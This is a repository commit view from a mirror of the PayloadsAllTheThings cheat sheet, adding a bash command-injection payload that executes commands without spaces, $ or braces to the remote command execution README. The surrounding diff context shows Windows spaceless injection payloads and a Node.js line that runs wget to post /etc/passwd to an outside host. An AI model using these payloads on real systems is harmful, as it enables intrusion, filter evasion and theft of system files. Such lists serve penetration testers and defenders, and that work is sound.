daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

RCE no {}, no space

patch-1
Swissky 2017-08-13 16:35:12 +02:00
parent 9adb81e6d8
commit 901d279fb3
1 changed files with 7 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
Remote commands execution/README.md
View File

@ -50,6 +50,12 @@ ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
```
Code execution without spaces, $ or { } - Linux (Bash only)
```
IFS=,;`cat<<<uname,-a`
```
## Time based data exfiltration
Extracting data : char by char
```
@ -82,3 +88,4 @@ require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
## Thanks to
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)
* [Bug Bounty Survey - Windows RCE spaceless](https://twitter.com/bugbsurveys/status/860102244171227136)
* [No PHP, no spaces, no $, no { }, bash only - @asdizzle](https://twitter.com/asdizzle_/status/895244943526170628)